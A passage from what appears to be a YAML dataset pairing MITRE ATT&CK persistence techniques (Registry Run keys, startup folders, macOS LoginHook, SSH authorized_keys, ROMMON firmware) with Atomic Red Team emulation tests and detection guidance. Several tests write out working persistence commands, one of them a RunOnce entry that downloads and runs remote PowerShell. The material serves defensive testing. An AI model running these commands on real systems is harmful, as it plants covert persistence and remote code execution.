by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks) + + + ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect. + name: ROMMONkit + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1542.004 + url: https://attack.mitre.org/techniques/T1542/004 + - source_name: Cisco Synful Knock Evolution + url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices + description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco + IOS devices. Retrieved October 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + x_mitre_platforms: + - Network + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_detection: There are no documented means for defenders to validate the + operation of the ROMMON outside of vendor support. If a network device is + suspected of being compromised, contact the vendor to assist in further investigation. + x_mitre_permissions_required: + - Administrator + x_mitre_data_sources: + - 'Firmware: Firmware Modification' + atomic_tests: [] + T1547.007: + technique: + created: '2020-01-24T18:15:06.641Z' + modified: '2020-01-24T19:51:37.795Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e + description: "Adversaries may modify plist files to automatically run an application + when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain + applications to be re-opened when a user logs into their machine after reboot. + While this is usually done via a Graphical User Interface (GUI) on an app-by-app + basis, there are property list files (plist) that contain this information + as well located at ~/Library/Preferences/com.apple.loginwindow.plist + and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. + \n\nAn adversary can modify one of these files directly to include a link + to their malicious executable to provide a persistence mechanism each time + the user reboots their machine (Citation: Methods of Mac Malware Persistence)." + name: Re-opened Applications + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.007 + url: https://attack.mitre.org/techniques/T1547/007 + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + x_mitre_platforms: + - macOS + x_mitre_data_sources: + - 'File: File Modification' + - 'Command: Command Execution' + x_mitre_detection: Monitoring the specific plist files associated with reopening + applications can indicate when an application has registered itself to be + reopened. + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1547.007 + atomic_tests: + - name: Re-Opened Applications + auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba + description: | + Plist Method + + [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) + supported_platforms: + - macos + executor: + steps: | + 1. create a custom plist: + + ~/Library/Preferences/com.apple.loginwindow.plist + + or + + ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist + name: manual + - name: Re-Opened Applications + auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb + description: | + Mac Defaults + + [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) + supported_platforms: + - macos + input_arguments: + script: + description: path to script + type: path + default: "/path/to/script" + executor: + command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} + +' + cleanup: 'sudo defaults delete com.apple.loginwindow LoginHook + +' + elevation_required: true + name: sh + T1108: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1108 + url: https://attack.mitre.org/techniques/T1108 + - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf + description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage + Units. Retrieved July 18, 2016. + source_name: Mandiant APT1 + description: "**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), + [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External + Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**\n\nAdversaries + may use more than one remote access tool with varying command and control + protocols or credentialed access to remote services so they can maintain access + if an access mechanism is detected or mitigated. \n\nIf one type of tool is + detected and blocked or removed as a response but the organization did not + gain a full understanding of the adversary's tools and access, then the adversary + will be able to retain access to the network. Adversaries may also attempt + to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) + to use [External Remote Services](https://attack.mitre.org/techniques/T1133) + such as external VPNs as a way to maintain access despite interruptions to + remote access tools deployed within a target network.(Citation: Mandiant APT1) + Adversaries may also retain access through cloud-based infrastructure and + applications.\n\nUse of a [Web Shell](https://attack.mitre.org/techniques/T1100) + is one such way to maintain access to a network through an externally accessible + Web server." + name: Redundant Access + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--6aabc5ec-eae6-422c-8311-38d45ee9838a + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-08T10:33:00.985Z' + created: '2017-05-31T21:31:18.867Z' + x_mitre_deprecated: true + x_mitre_is_subtechnique: false + x_mitre_version: '3.1' + x_mitre_defense_bypassed: + - Network intrusion detection system + - Anti-virus + x_mitre_detection: |- + Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost. + + Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators. + + If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation. + + For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information. + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS + - Linux + - macOS + x_mitre_permissions_required: + - User + - Administrator + - SYSTEM + x_mitre_contributors: + - Praetorian + atomic_tests: [] + T1547.001: + technique: + id: attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279 + description: |- + Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. + + Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. + + The following run keys are created by default on Windows systems: + + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce + + Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) + + The following Registry keys can be used to set startup folder items for persistence: + + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders + * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders + * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders + + The following Registry keys can control automatic startup of services during boot: + + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices + + Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: + + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run + + The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs. + + Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on. + + By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. + + Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. + name: Registry Run Keys / Startup Folder + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.001 + url: https://attack.mitre.org/techniques/T1547/001 + - external_id: CAPEC-270 + source_name: capec + url: https://capec.mitre.org/data/definitions/270.html + - url: http://msdn.microsoft.com/en-us/library/aa376977 + description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November + 12, 2014. + source_name: Microsoft Run Key + - source_name: Microsoft Wow6432Node 2018 + url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry + description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data + in the Registry. Retrieved August 3, 2020. + - source_name: Malwarebytes Wow6432Node 2016 + url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ + description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved + August 3, 2020. + - url: https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key + description: Microsoft. (2018, August 20). Description of the RunOnceEx Registry + Key. Retrieved June 29, 2018. + source_name: Microsoft RunOnceEx APR 2018 + - url: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ + description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden + from Autoruns.exe. Retrieved June 29, 2018. + source_name: Oddvar Moe RunOnceEx Mar 2018 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-01-06T18:36:29.226Z' + created: '2020-01-23T22:02:48.566Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Oddvar Moe, @oddvarmoe + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Modification' + - 'Command: Command Execution' + - 'Process: Process Creation' + x_mitre_detection: |- + Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. + + Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1547.001 + atomic_tests: + - name: Reg Key Run + auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05 + description: "Run Key Persistence\n\nUpon successful execution, cmd.exe will + modify the registry by adding \\\"Atomic Red Team\\\" to the Run key. Output + will be via stdout. \n" + supported_platforms: + - windows + input_arguments: + command_to_execute: + description: Thing to Run + type: Path + default: C:\Path\AtomicRedTeam.exe + executor: + command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V + "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" + +' + cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" + /V "Atomic Red Team" /f >nul 2>&1 + +' + name: command_prompt + - name: Reg Key RunOnce + auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb + description: "RunOnce Key Persistence.\n\nUpon successful execution, cmd.exe + will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will + be via stdout. \n" + supported_platforms: + - windows + input_arguments: + thing_to_execute: + description: Thing to Run + type: Path + default: C:\Path\AtomicRedTeam.dll + executor: + command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend + /v 1 /d "#{thing_to_execute}" + +' + cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend + /v 1 /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: PowerShell Registry RunOnce + auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42 + description: | + RunOnce Key Persistence via PowerShell + Upon successful execution, a new entry will be added to the runonce item in the registry. + supported_platforms: + - windows + input_arguments: + thing_to_execute: + description: Thing to Run + type: Path + default: powershell.exe + reg_key_path: + description: Path to registry key to update + type: Path + default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce + executor: + command: | + $RunOnceKey = "#{reg_key_path}" + set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' + cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" + -Force -ErrorAction Ignore + +' + name: powershell + elevation_required: true + - name: Suspicious vbs file run from startup Folder + auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 + description: "vbs files can be placed in and ran from the startup folder to + maintain persistance. Upon execution, \"T1547.001 Hello, World VBS!\" will + be displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start + Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted + and the user logs in.\n" + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" + Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" + cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" + cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore + Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Suspicious jse file run from startup Folder + auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06 + description: "jse files can be placed in and ran from the startup folder to + maintain persistance.\nUpon execution, \"T1547.001 Hello, World JSE!\" will + be displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start + Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted + and the user logs in.\n" + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" + Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" + cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" + cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore + Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Suspicious bat file run from startup Folder + auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e + description: | + bat files can be placed in and executed from the startup folder to maintain persistance. + Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" + folder and will also run when the computer is restarted and the user logs in. + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" + Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" + Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" + Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore + Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Add Executable Shortcut Link to User Startup Folder + auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d + description: 'Adds a non-malicious executable shortcut link to the current users + startup directory. Test can be verified by going to the users startup directory + and checking if the shortcut link exists. ' + supported_platforms: + - windows + executor: + command: "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation + = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell + = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath + = $Target\n$Create.Save() " + cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start + Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore + name: powershell + elevation_required: true + T1505.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1505.001 + url: https://attack.mitre.org/techniques/T1505/001 + - source_name: NetSPI Startup Stored Procedures + url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/ + description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via + SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.' + - source_name: Kaspersky MSSQL Aug 2019 + url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/ + description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote + attack on Microsoft SQL Server. Retrieved September 4, 2019.' + - source_name: Microsoft xp_cmdshell 2017 + url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017 + description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved + September 9, 2019. + - source_name: Microsoft CLR Integration 2017 + url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017 + description: Microsoft. (2017, June 19). Common Language Runtime Integration. + Retrieved July 8, 2019. + - source_name: NetSPI SQL Server CLR + url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/ + description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies. + Retrieved July 8, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: SQL Stored Procedures + description: "Adversaries may abuse SQL stored procedures to establish persistent + access to systems. SQL Stored Procedures are code that can be saved and reused + so that database users do not waste time rewriting frequently used SQL queries. + Stored procedures can be invoked via SQL statements to the database using + the procedure name or via defined events (e.g. when a SQL server application + is started/restarted).\n\nAdversaries may craft malicious stored procedures + that can provide a persistence mechanism in SQL database servers.(Citation: + NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute + operating system commands through SQL syntax the adversary may have to enable + additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: + NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: + Microsoft xp_cmdshell 2017) \n\nMicrosoft SQL Server can enable common language + runtime (CLR) integration. With CLR integration enabled, application developers + can write stored procedures using any .NET framework language (e.g. VB .NET, + C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft + or modify CLR assemblies that are linked to stored procedures since these + CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI + SQL Server CLR) " + id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-25T23:30:20.638Z' + created: '2019-12-12T14:59:58.168Z' + x_mitre_data_sources: + - 'Application Log: Application Log Content' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + - root + x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: + NetSPI Startup Stored Procedures) Consider enabling audit features that can + log malicious startup activities.' + x_mitre_contributors: + - Carlos Borges, @huntingneo, CIP + - Lucas da Silva Pereira, @vulcanunsec, CIP + - Kaspersky + x_mitre_platforms: + - Windows + - Linux + atomic_tests: [] + T1098.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1098.004 + url: https://attack.mitre.org/techniques/T1098/004 + - source_name: SSH Authorized Keys + url: https://www.ssh.com/ssh/authorized_keys/ + description: ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June + 24, 2020. + - source_name: Venafi SSH Key Abuse + url: https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities + description: 'Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity + Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, + 2020.' + - source_name: Cybereason Linux Exim Worm + url: https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability + description: Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting + Linux Exim Server Vulnerability. Retrieved June 24, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: SSH Authorized Keys + description: |- + Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. + + Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm) + id: attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-06-25T16:32:23.367Z' + created: '2020-06-24T12:42:35.144Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file. + + Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + x_mitre_contributors: + - Tony Lambert, Red Canary + x_mitre_platforms: + - Linux + - macOS + identifier: T1098.004 + atomic_tests: + - name: Modify SSH Authorized Keys + auto_generated_guid: 342cc723-127c-4d3a-8292-9c0c6b4ecadc + description: "Modify contents of /.ssh/authorized_keys to maintain + persistence on victim host. \nIf the user is able to save the same contents + in the authorized_keys file, it shows user can modify the file.\n" + supported_platforms: + - macos + - linux + executor: + name: bash + elevation_required: false + command: 'if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat + ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; + fi; + +' + cleanup_command: 'unset ssh_authorized_keys + +' + T1053.005: + technique: + created: '2019-11-27T14:58:00.429Z' + modified: '2020-12-30T14:26:44.730Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1053.005 + url: https://attack.mitre.org/techniques/T1053/005 + - url: https://twitter.com/leoloobeek/status/939248813465853953 + description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved + December 12, 2017. + source_name: Twitter Leoloobeek Scheduled Task + - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen + description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention + settings. Retrieved December 12, 2017. + source_name: TechNet Forum Scheduled Task Operational Setting + - url: https://technet.microsoft.com/library/dd315590.aspx + description: Microsoft. (n.d.). General Task Registration. Retrieved December + 12, 2017. + source_name: TechNet Scheduled Task Events + - source_name: Microsoft Scheduled Task Events Win10 + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events + description: Microsoft. (2017, May 28). Audit Other Object Access Events. + Retrieved June 27, 2019. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Scheduled Task + description: |- + Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. + + The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel. + + An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). + id: attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9 + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Monitor process execution from the svchost.exe in Windows 10 